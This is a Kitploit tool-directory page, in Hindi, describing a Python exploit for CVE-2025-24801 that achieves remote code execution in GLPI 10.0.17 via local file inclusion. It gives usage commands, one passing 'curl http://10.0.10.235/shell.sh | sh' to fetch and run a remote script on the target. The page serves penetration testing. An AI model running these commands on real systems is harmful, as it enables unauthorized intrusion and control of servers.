Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/r1beirin/exploit-cve-2025-24801
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubr1beirin/exploit-cve-2025-24801

Exploit-CVE-2025-24801

CVE-2025-24801 के लिए Python शोषण जो GLPI 10.0.17 में स्थानीय फ़ाइल समावेशन के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करता है। पोस्ट-शोषण के लिए कमांड निष्पादन मोड शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-24801

यह एक्सप्लॉइट GLPI 10.0.17 में Local File Inclusion (LFI) के माध्यम से Remote Code Execution (RCE) प्राप्त करने के लिए CVE-2025-24801 का उपयोग करता है। इस CVE का Proof of Concept (PoC) GLPI में इस कमजोरी के स्पष्टीकरण के साथ दिया गया है।

अवलोकन

कुछ एप्लिकेशन /glpi/ एंडपॉइंट को उजागर करते हैं (जैसे, http://172.16.11.130:8080/glpi/front/computer.form.php)। यदि लक्षित एप्लिकेशन में यह एंडपॉइंट शामिल है, तो इसे --url पैरामीटर में जोड़ना आवश्यक है (जैसे, --url http://172.16.11.130:8080/glpi)।

उपयोग

उपयोग का उदाहरण।

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password

यदि आप पहले ही इस एक्सप्लॉइट को चला चुके हैं और RCE को ट्रिगर कर चुके हैं, तो आप केवल कमांड निष्पादित करने के लिए --cmd पैरामीटर का उपयोग कर सकते हैं।

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
टूल डाउनलोड करें